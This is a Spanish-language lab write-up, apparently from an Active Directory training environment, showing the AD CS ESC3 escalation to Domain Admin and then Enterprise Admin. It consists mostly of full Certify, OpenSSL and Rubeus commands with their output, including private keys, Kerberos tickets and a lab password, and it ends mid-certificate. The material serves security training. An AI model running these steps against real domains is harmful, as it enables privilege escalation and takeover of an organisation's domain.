# AD CS - ESC3 ## Escalacion de Domain Admin Solicitamos un certificado. ``` C:\AD\Tools>Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Agent _____ _ _ __ / ____| | | (_)/ _| | | ___ _ __| |_ _| |_ _ _ | | / _ \ '__| __| | _| | | | | |___| __/ | | |_| | | | |_| | \_____\___|_| \__|_|_| \__, | __/ | |___./ v1.0.0 [*] Action: Request a Certificates [*] Current user context : dcorp\student723 [*] No subject name specified, using current context as subject. [*] Template : SmartCardEnrollment-Agent [*] Subject : CN=student723, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local [*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA [*] CA Response : The certificate had been issued. [*] Request ID : 26 [*] cert.pem : -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEA4I+FDOA8/1N634WYW2BSqSpnjru2LW/C+THLJXUg3BQEhoBU y70qhujvGDUtJO0NJ5n0yTar0bjme6rvFvAMeGQ5KynknMCr9P+VFASS3lhbWNpA R+ZwMcyvXSivmBiK50WLrwbfw1vGKeXq103qJiMpNJQqeCsbD6WcohcsMkaGGCJe na7fFKWjOHprQBS/xv0PyLIS4LEe2pCwe6nfu9C9V6DFTkGPEvPmC3OAWKXbAGEZ RdqNDiskUlyuHA2UvMyEdl5q8JfiLG6qJ8n3OtH273LveZ1stxmPYmOzzBHdAITf 54OAKlqcQHRZ13i4QlJpavLfwXpXkBvoLpS/1QIDAQABAoIBAG/Q5wZfTeAxODi+ s/uj/eUAGWqoK3F6ehJNagMvzHnpectjcVW1zsw4hn1+VQlTBD7Y2Vur3mhiclnX 5o98XilAdnr4tD4dbkJjVV8PW/Zc9rdKjcF/jBQwAI4ZqT3J0riQF5rCiH8lXooU Uxh8UoBE98qXkIIfrKzg4RqRAU/SgTj+YWM+GcC3cDhkqqLMPeUlJlR08zP2u5EK YKDwkoarNnq6Tmu2a4r1RQdd9W7U0kF2vqaO9n0sV51gewAkDU8oIv6IUvSLLFOV ukDhHs7jeh746SQ3uOCC9yf2NVff9EOef7yJwbPraGhADAlF2sH0evH1ZmKQBYT5 EuLUoW0CgYEA674X9ocQeeDdTsjE3Ez6d5Qpl9ccwZe7WjD5HPLcDaacKFDO5EO6 Iu+7Vw6t+LZO0shLQi5LWeLKis7nrxn+HAFkp2vyiXG6kAlH4EORP6Ij7z3iu5oW OJ+vHTAwGedgIUc8rdYsFdFwyJAOYv/iEuOleCutRZfDqLeJpJebC1cCgYEA89tx rj9eZbawAuoQ1Sg4jLxWaRi2BnY3oRCAOZFIXGSY1nf1onR7fQpKpBW/5hhjBrHo Utt8nXk5CjbiC0O+pJU8tzs0slFfFUFsm9pzqmS8rR8jtTewdWnXshW61+vyyg9B WCFpYM+AriN6bdp35uInIlIm0wO/1FQdYJfBfrMCgYAUVKyUYkmVeUMczEvOBAWF 0o1TvwWH3KIXwSl6yacYtkm5YF63aO/gm3Q4qddvH6nkm8mBx6RP+DMnjXiFrWQw 3h3kInckS16flW1RdgJMzpryww+OxlcsQvlDNyiu0zmDJTWieFoM96cWZPYYq6C/ qEpY9stWuSPypQGF5F1GuQKBgQCec4CykEpuHP7RZfX6C2BzUg1zzLK6ECalaWtn /JbgMh19fgUFwlpbLUzCwb8na8EsoH0tGaEnUZVWpcLLPwGpP69r//SFyYnW7eP8 gT2XAk32z70MC1uFb3jQJn55vr7LvI3hDhTC6xHaFQOATeyLAXgcPPUtN8p11RIh qXn5MQKBgBJmd1QU4oytAiefNZMurrzTUbH7dGRM01bGd2fTkgHeEBvtU8+60P3F d2h1T6HdMXz8KZoNN9UJwHHeMgKinMdiVIcC9aRHYOsKRreVnV4ZP/NKexWa08Jr mQwxc1Cd/QVxrKy1OFpzjeKGqHhxw7240xofFglMR39IFWo99lsZ -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIGWDCCBUCgAwIBAgITFQAAABqkSkxB1toZ7AAAAAAAGjANBgkqhkiG9w0BAQsF ADBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxGTAXBgoJkiaJk/IsZAEZFgltb25l eWNvcnAxHjAcBgNVBAMTFW1vbmV5Y29ycC1NQ09SUC1EQy1DQTAeFw0yNDAzMDQx NDEzNTBaFw0yNjAzMDQxNDIzNTBaMHMxFTATBgoJkiaJk/IsZAEZFgVsb2NhbDEZ MBcGCgmSJomT8ixkARkWCW1vbmV5Y29ycDEaMBgGCgmSJomT8ixkARkWCmRvbGxh cmNvcnAxDjAMBgNVBAMTBVVzZXJzMRMwEQYDVQQDEwpzdHVkZW50NzIzMIIBIjAN BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4I+FDOA8/1N634WYW2BSqSpnjru2 LW/C+THLJXUg3BQEhoBUy70qhujvGDUtJO0NJ5n0yTar0bjme6rvFvAMeGQ5Kynk nMCr9P+VFASS3lhbWNpAR+ZwMcyvXSivmBiK50WLrwbfw1vGKeXq103qJiMpNJQq eCsbD6WcohcsMkaGGCJena7fFKWjOHprQBS/xv0PyLIS4LEe2pCwe6nfu9C9V6DF TkGPEvPmC3OAWKXbAGEZRdqNDiskUlyuHA2UvMyEdl5q8JfiLG6qJ8n3OtH273Lv eZ1stxmPYmOzzBHdAITf54OAKlqcQHRZ13i4QlJpavLfwXpXkBvoLpS/1QIDAQAB o4IDBDCCAwAwPAYJKwYBBAGCNxUHBC8wLQYlKwYBBAGCNxUIheGocofMn2jhhyaC n65RgvL2fYE/guHdfLntDQIBZAIBBTAVBgNVHSUEDjAMBgorBgEEAYI3FAIBMA4G A1UdDwEB/wQEAwIHgDAdBgkrBgEEAYI3FQoEEDAOMAwGCisGAQQBgjcUAgEwHQYD VR0OBBYEFLIybQhTIdy7OWfq9O6ilUvG/WwgMB8GA1UdIwQYMBaAFNH+jQqn+rQy nzb8ILj3y55oxUXtMIHYBgNVHR8EgdAwgc0wgcqggceggcSGgcFsZGFwOi8vL0NO PW1vbmV5Y29ycC1NQ09SUC1EQy1DQSxDTj1tY29ycC1kYyxDTj1DRFAsQ049UHVi bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv bixEQz1tb25leWNvcnAsREM9bG9jYWw/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlz dD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHLBggrBgEF BQcBAQSBvjCBuzCBuAYIKwYBBQUHMAKGgatsZGFwOi8vL0NOPW1vbmV5Y29ycC1N Q09SUC1EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049 U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1tb25leWNvcnAsREM9bG9jYWw/ Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRo b3JpdHkwQAYDVR0RBDkwN6A1BgorBgEEAYI3FAIDoCcMJXN0dWRlbnQ3MjNAZG9s bGFyY29ycC5tb25leWNvcnAubG9jYWwwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEE AYI3GQIBoDAELlMtMS01LTIxLTcxOTgxNTgxOS0zNzI2MzY4OTQ4LTM5MTc2ODg2 NDgtMTM2MDMwDQYJKoZIhvcNAQELBQADggEBAGRWjvCZo4ipjK9mKrEjS9Vz4+bW 7ZfWY7AjLcO2She2yuN1qtxTUFF5RlF9QeMOskAaSrYmrxI7qPhbi4O/pRyu7Yjj 8VrB6TziF2Yrb7+jtacDawRKk5cZv5YagG62oVOOzWkc/o4AIrZiqPKrdwrYWFuD TDIs2oR3cFMSqwr2Q9XQckQQBZw1Qnnv1vRfxV2QghGJPCj7S6vwmMWx4S/0LdGI qj+yNgp1NhraP2Qj6UzEJzMFTtAocLpUbSurjWz4/Bvl8E6+BUDo2zqjqHMDV1wt ueKsLOYrdF5kIoWuRC8ONUZnqpPAP9CQsJOq2v1s5+Tblar1oXzqLqHX1mU= -----END CERTIFICATE----- [*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx Certify completed in 00:00:11.6275190 ``` Guardamos el output en un archivo cert.pem y luego, convertimos cert.pem en pfx. ``` PS C:\AD\Tools\openssl> .\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc3agent.pfx WARNING: can't open config file: /usr/local/ssl/openssl.cnf Enter Export Password: Verifying - Enter Export Password: ``` Nos pidio una password, seteamos SecretPass\@123. Luego realizamos una siguiente consulta. {% code overflow="wrap" %} ``` PS C:\AD\Tools\openssl> ..\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator /enrollcert:esc3agent.pfx /enrollcertpw:SecretPass@123 _____ _ _ __ / ____| | | (_)/ _| | | ___ _ __| |_ _| |_ _ _ | | / _ \ '__| __| | _| | | | | |___| __/ | | |_| | | | |_| | \_____\___|_| \__|_|_| \__, | __/ | |___./ v1.0.0 [*] Action: Request a Certificates [*] Current user context : dcorp\student723 [*] Template : SmartCardEnrollment-Users [*] On Behalf Of : dcorp\administrator [*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA [*] CA Response : The certificate had been issued. [*] Request ID : 27 [*] cert.pem : -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAsh7G2kKtVYbKmHfuRw6gO/JMWE1JfXeUOPYWXloNGn4SvjEQ +MxdZOUvvS5ieRoWnux49AXWBlqicyMGTKIEIM1pGbW79SFv7cna12xIHskcmB4X WzglCfSri/X55G4hgWghwxFfLZB1zL++uAdr9K4dZsMQh96Es1tGJH6cXLUw7gdG Zy/3+DyOBQSfCCnfHE7a/LjF8lBrd4C9Gs6K55Uo7LkxL0AeczHJqdoO7H8TQG7h jF/hqL0b/qdKiM4Eny4JGpdyp7nQqBCb2PoNN7JwZWcs1/ZZEj96SjsdkKCNRoHq TOkZJXH4SayEBR6GJ/3691BNNg1fRV9IrgQf/QIDAQABAoIBABgoBF/lWwyWUzOK UE5itWhr29693JGffgKbnTz+iXhmULRqgxq63I+qZWcKu2AhIaA8ActWX0hNUmq6 /Ue3UUgBk5dhBjSgbEWbcop0rPM/4xjeO9yrKJrJC9rXaSSJqxGZxbpmyLmtNcym 1H6wwvtUAbjGC5/hla2dW03nvdz0m6VPI0TC4Wax2uxP3eRhSoAxk27ww/VoZwNA 2kxULuB5s2yKz1HCkqcXiTfbA8mEbASBUOxGsRgUa4Gg6rJDpA6hJM+YCD6IGgjV oBpaCFXg2cwfC0SpYuZmfholasp/6SP5GeborIzBcWI65WD/Pg3HqsFrnv7Q71Vp gLTCKSECgYEAxDBOtz9TRtK+EzWTx6UaRdhFITGFDB5enJvtTJ3byg6YKlHwi6RE S5sRJolnUIlHKPCCNdVstbeLGoWgIsKlcrIX0BOgTxk8CpoPOzuM5FSRKLiCxHPR Spsw3+QjOoiPEx51HtvYQ/WB1aXfK9+Zhq7UpLkaHTA6Bcne4K6LaZ8CgYEA6GxN Klk51fgBxjYhDS8CRDJojjqbGjKF170p+ebBlLPfnlahIhH1A6VfEqtFedJGu71z xdJhnrptHwXrYUnHJkDPnT1vp6FgQ2C8rzCa776wYczlk9Wb96jJzq+6MWC0DQ3y lnGuzahG0/W1nzwyw6Yo3FFiL7jdxZkzusUXiOMCgYAg+JViCoxuTKCRDeIGHWMq 9cu4ZmAbx0bTPwlEZQs5C/bateadMUAhDLB3L4Rjbo68/J6FeZbJe00vaeGdteSk P/XsjD/Wy0Dh7z48ECf/f47drxSa+3Pi++3c0rRw895HskiwpPXVhf8J7tRwxSVC E0O9YzZWTXKS4nhIfk0DtQKBgQCqCooOAIditnY92F4n8gt7b1G1NMVCzlHDe56Z OSzJKSviAMkUTwTtbPB4jRtgO+oJ8logEYHgCc5J0x/Y5owvvVznUgo9HsB5qu2A UlQYMG+Erc4McUwRTciPUVssQu6XWmvviy5zQbjH28zLudP99bORNG1cMqj1ptcE vqswNwKBgQC7jXXlxJAp7JsccotkjZ/DubvIM6Kw4+49SfYBVmmymV5L+unC4TzH OnEqFZfU9gXhF9Zd4d6o0NmWN+3OCYk9kJ55WA1bQEkQkU0N2eZqeXxLViz4i2u/ vH1UVu6LzLK/p9wWrtKrCdOVZJXmLtjj5dQhDyFpT4B1J4DJR0oFJQ== -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIGiTCCBXGgAwIBAgITFQAAABulaPWVel6L8gAAAAAAGzANBgkqhkiG9w0BAQsF ADBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxGTAXBgoJkiaJk/IsZAEZFgltb25l eWNvcnAxHjAcBgNVBAMTFW1vbmV5Y29ycC1NQ09SUC1EQy1DQTAeFw0yNDAzMDQx NDMwMzlaFw0yNjAzMDQxNDQwMzlaMHYxFTATBgoJkiaJk/IsZAEZFgVsb2NhbDEZ MBcGCgmSJomT8ixkARkWCW1vbmV5Y29ycDEaMBgGCgmSJomT8ixkARkWCmRvbGxh cmNvcnAxDjAMBgNVBAMTBVVzZXJzMRYwFAYDVQQDEw1BZG1pbmlzdHJhdG9yMIIB IjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsh7G2kKtVYbKmHfuRw6gO/JM WE1JfXeUOPYWXloNGn4SvjEQ+MxdZOUvvS5ieRoWnux49AXWBlqicyMGTKIEIM1p GbW79SFv7cna12xIHskcmB4XWzglCfSri/X55G4hgWghwxFfLZB1zL++uAdr9K4d ZsMQh96Es1tGJH6cXLUw7gdGZy/3+DyOBQSfCCnfHE7a/LjF8lBrd4C9Gs6K55Uo 7LkxL0AeczHJqdoO7H8TQG7hjF/hqL0b/qdKiM4Eny4JGpdyp7nQqBCb2PoNN7Jw ZWcs1/ZZEj96SjsdkKCNRoHqTOkZJXH4SayEBR6GJ/3691BNNg1fRV9IrgQf/QID AQABo4IDMjCCAy4wPQYJKwYBBAGCNxUHBDAwLgYmKwYBBAGCNxUIheGocofMn2jh hyaCn65RgvL2fYE/hrSlX4e6+hgCAWQCAQkwKQYDVR0lBCIwIAYIKwYBBQUHAwQG CisGAQQBgjcKAwQGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIHgDA1BgkrBgEEAYI3 FQoEKDAmMAoGCCsGAQUFBwMEMAwGCisGAQQBgjcKAwQwCgYIKwYBBQUHAwIwHQYD VR0OBBYEFI5EV5KeZWsEuE61TLIlOGQnPdOoMB8GA1UdIwQYMBaAFNH+jQqn+rQy nzb8ILj3y55oxUXtMIHYBgNVHR8EgdAwgc0wgcqggceggcSGgcFsZGFwOi8vL0NO PW1vbmV5Y29ycC1NQ09SUC1EQy1DQSxDTj1tY29ycC1kYyxDTj1DRFAsQ049UHVi bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv bixEQz1tb25leWNvcnAsREM9bG9jYWw/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlz dD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHLBggrBgEF BQcBAQSBvjCBuzCBuAYIKwYBBQUHMAKGgatsZGFwOi8vL0NOPW1vbmV5Y29ycC1N Q09SUC1EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049 U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1tb25leWNvcnAsREM9bG9jYWw/ Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRo b3JpdHkwQwYDVR0RBDwwOqA4BgorBgEEAYI3FAIDoCoMKGFkbWluaXN0cmF0b3JA ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWwwTQYJKwYBBAGCNxkCBEAwPqA8Bgor BgEEAYI3GQIBoC4ELFMtMS01LTIxLTcxOTgxNTgxOS0zNzI2MzY4OTQ4LTM5MTc2 ODg2NDgtNTAwMA0GCSqGSIb3DQEBCwUAA4IBAQBlDd98YeMYrHARcbV18wL3CBMK Bg5XBYpfQwKQ887DYJkC4v/KqjSFqbaGZBA9oRnvb9JohkDAtQZqjyfIOYyAd5Kp zp32AZcMssWn5crKgCAua+9iTUEgybsfqN+WBMACfUISzFDK6za81G1/zmTbOitx Liw1xWx67PX4etRUfJrY8o881yw/eEPPMUaiClhVtbt6rh3PW4H3CiSX7ntN8CF6 JgbZhdYXQDsEjqVR9hkizP2GlcLQZTirLAxQucbuAQFBYvFS7yAFVo126wKxdV03 gY8E7gWKl7NvmVpLfoELZMu497VZI5HavPSEo/886tIJSWAGte+YSeORcSuF -----END CERTIFICATE----- [*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx Certify completed in 00:00:06.6038748 PS C:\AD\Tools\openssl> ``` {% endcode %} Luego volvemos a guardar esto como cert.pem y volvemos a exportar como .pfx. ``` PS C:\AD\Tools\openssl> .\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc3user-DA.pfx WARNING: can't open config file: /usr/local/ssl/openssl.cnf Enter Export Password: Verifying - Enter Export Password: ``` Ahora ejecutamos rubeus para cargar el certificado como un ticket. ``` PS C:\AD\Tools\openssl> ..\Rubeus.exe asktgt /user:administrator /certificate:esc3user-DA.pfx /password:SecretPass@123 /ptt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.1 [*] Action: Ask TGT [*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local [*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\administrator' [*] Using domain controller: 172.16.2.1:88 [+] TGT request successful! [*] base64(ticket.kirbi): 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 ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWw= [+] Ticket successfully imported! ServiceName : krbtgt/dollarcorp.moneycorp.local ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL UserName : administrator UserRealm : DOLLARCORP.MONEYCORP.LOCAL StartTime : 3/4/2024 6:48:14 AM EndTime : 3/4/2024 4:48:14 PM RenewTill : 3/11/2024 7:48:14 AM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : Sl/gcL97Sj/f0krXskSMbw== ASREP (key) : 58B85F272C982B60EB11A37B72D188F3 PS C:\AD\Tools\openssl> ``` Verificamos que tenemos acceso. ``` PS C:\AD\Tools\openssl> ls \\dcorp-dc\C$ Directory: \\dcorp-dc\C$ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 5/8/2021 1:20 AM PerfLogs d-r--- 11/14/2022 10:12 PM Program Files d----- 5/8/2021 2:40 AM Program Files (x86) d-r--- 3/4/2024 6:11 AM Users d----- 1/10/2024 12:59 AM Windows PS C:\AD\Tools\openssl> Enter-PSSession -Computername dcorp-dc [dcorp-dc]: PS C:\Users\Administrator\Documents> whoami dcorp\administrator [dcorp-dc]: PS C:\Users\Administrator\Documents> hostname dcorp-dc [dcorp-dc]: PS C:\Users\Administrator\Documents> ``` ## Escalacion a Enterprice Admin Con el archivo esc3agent.pfx generado anteriormente, solicitamos un certificado de nuevo. ``` PS C:\AD\Tools\openssl> ..\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:mcorp\administrator /enrollcert:esc3agent.pfx /enrollcertpw:SecretPass@123 _____ _ _ __ / ____| | | (_)/ _| | | ___ _ __| |_ _| |_ _ _ | | / _ \ '__| __| | _| | | | | |___| __/ | | |_| | | | |_| | \_____\___|_| \__|_|_| \__, | __/ | |___./ v1.0.0 [*] Action: Request a Certificates [*] Current user context : dcorp\student723 [*] Template : SmartCardEnrollment-Users [*] On Behalf Of : mcorp\administrator [*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA [*] CA Response : The certificate had been issued. [*] Request ID : 30 [*] cert.pem : -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAxi4Jch9h1sz4IHPyrvhw6Kk188lfzepHfOFVGMLu9iWxWiqv O2ULTu17OXhXTKNJ7/UQrUBZxWKVZPWv2E8HFCurruD0G4QPMTkDgPm8TZL437xg ykE205K1LdvBxqC6DnfogfR7wB2sk3S7TO0LZNT/dt1QaDhGjilarHo7As8XXWfF pjrJzt2H4pR/n0DUBzEsr9RLsQgBEItpYE61kOiHvI4HgBzz56+bTzjBJUz2/Pzy H9lGzXym1oqtCZ+OKeDgUPMt0JgnOvjcI0QGK4CNyVHoaTaUZLLA3DqMNrHZgLmy oFKhgnZ9RAC/OZFMTS4WNAxUCJGwh6iVdwMaDQIDAQABAoIBAF92c6Rei5Gd4HQ5 hhBUqobYY53QRe75yH/WR1iLJfK6C2lkoE5bCQx3BuGTH3JSQd5tzR+3nMahC1e7 pX3r63wC4Ut3Hv9WKL9MOGzbX6J6hpm3s2QZ7+AQjmfNsNUOPTGU/xICg83yPVw2 YbbXhKKIm5pVV1MssIfwUbY9lsltwUsg7zMHEYSaBkFix/fRIcGQ+UW4V7rzFj3d qigfpeO1JnA2xRz3gceNi/gb9znBOPx0j14n7tYAck4y4UE1Ymf42LCZdveL7/m4 H7KyV37BhmJFl/EP54ERIUCiUL8naoDUJ7z+Ow+zgRZUU7vxkC9LSrgvC9K1+A6g vyxzF10CgYEA3aA5bgLf7xzJ31d1CqDUKOAkHIP2dWzC09a2AKbkafcDRGij95RO EqI/U80FjrfybCl+e3diVPqs9aFdJ653SceToyk9sAhlUB8mBFBG2xOm8ZOl2pTq 1SBbCFj/TL5rf2MK2iQrwNvzOoHTNDD0Y5AwjSOCcZOpcl3Z5rWO3pMCgYEA5Orf 6EQw5p5setYoPpm3G0f8GZjEtgF+BVANvEy0X3lWMu2Q7lv0IK9TftcxeaDeMIId EKmfLsG2+x44F3ehtsUP1q7x9x7F/ntTOZDqKKS1AQiDE46jkL6d0HP1CQM5mVdw i8dVLDJNkkM9q/zBPMZ3WApekKkyd+mPQQD+6N8CgYAsr4ek1NOOBMH3VEz3DaJ5 c2gUj877sig+SkZ8LypS60kvW+Hjo3VycGBQZ0A9nH02rc8g2dtrwvdot1ZvD9Bh geoUtdYITkkPNJiXug/vUDES+HAyeGA5BMMWFcu0D5jhIHkprq1bv311SIPrPAuq n4IKkyRT/i/mLWIoEGd0HQKBgG/rzfFXdbkrd8pO7no82WODPGSfZn2+GQkr7KtF rWKIhnZ75EJFvwRD9EStncjjt/5rfx5ocCWCHJ6GVdJTcUNU8bt66V5zM0aKsVQR 4ApjDQQmTz++m4XnTG1gZEs1wnGQaLxOhvwG1BpQudRezXOTbUIkP7vmnYA3Nw0H GZptAoGANjvHmK7AYApsr9LJaGiN3G4BH4g66MFU6Yr7FMIHT5Y8EqWBcjsMCn0B 3kvOw+TUPWYIbtWPCanRb+YhgWMWRm0q0tWDgwtruT4ALQd6QDrlGAu4ypFV4Mj0 JaDILhOhbFzBTjXO76/5YxsbAje4SrGYukHh9XN5aRkN7YZzI2U= -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIGYTCCBUmgAwIBAgITFQAAAB72ASdAO29fkgAAAAAAHjANBgkqhkiG9w0BAQsF ADBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxGTAXBgoJkiaJk/IsZAEZFgltb25l eWNvcnAxHjAcBgNVBAMTFW1vbmV5Y29ycC1NQ09SUC1EQy1DQTAeFw0yNDAzMDQx NTE2NDNaFw0yNjAzMDQxNTI2NDNaMFoxFTATBgoJkiaJk/IsZAEZFgVsb2NhbDEZ MBcGCgmSJomT8ixkARkWCW1vbmV5Y29ycDEOMAwGA1UEAxMFVXNlcnMxFjAUBgNV BAMTDUFkbWluaXN0cmF0b3IwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB AQDGLglyH2HWzPggc/Ku+HDoqTXzyV/N6kd84VUYwu72JbFaKq87ZQtO7Xs5eFdM o0nv9RCtQFnFYpVk9a/YTwcUK6uu4PQbhA8xOQOA+bxNkvjfvGDKQTbTkrUt28HG oLoOd+iB9HvAHayTdLtM7Qtk1P923VBoOEaOKVqsejsCzxddZ8WmOsnO3YfilH+f QNQHMSyv1EuxCAEQi2lgTrWQ6Ie8jgeAHPPnr5tPOMElTPb8/PIf2UbNfKbWiq0J n44p4OBQ8y3QmCc6+NwjRAYrgI3JUehpNpRkssDcOow2sdmAubKgUqGCdn1EAL85 kUxNLhY0DFQIkbCHqJV3AxoNAgMBAAGjggMmMIIDIjA9BgkrBgEEAYI3FQcEMDAu BiYrBgEEAYI3FQiF4ahyh8yfaOGHJoKfrlGC8vZ9gT+GtKVfh7r6GAIBZAIBCTAp BgNVHSUEIjAgBggrBgEFBQcDBAYKKwYBBAGCNwoDBAYIKwYBBQUHAwIwDgYDVR0P 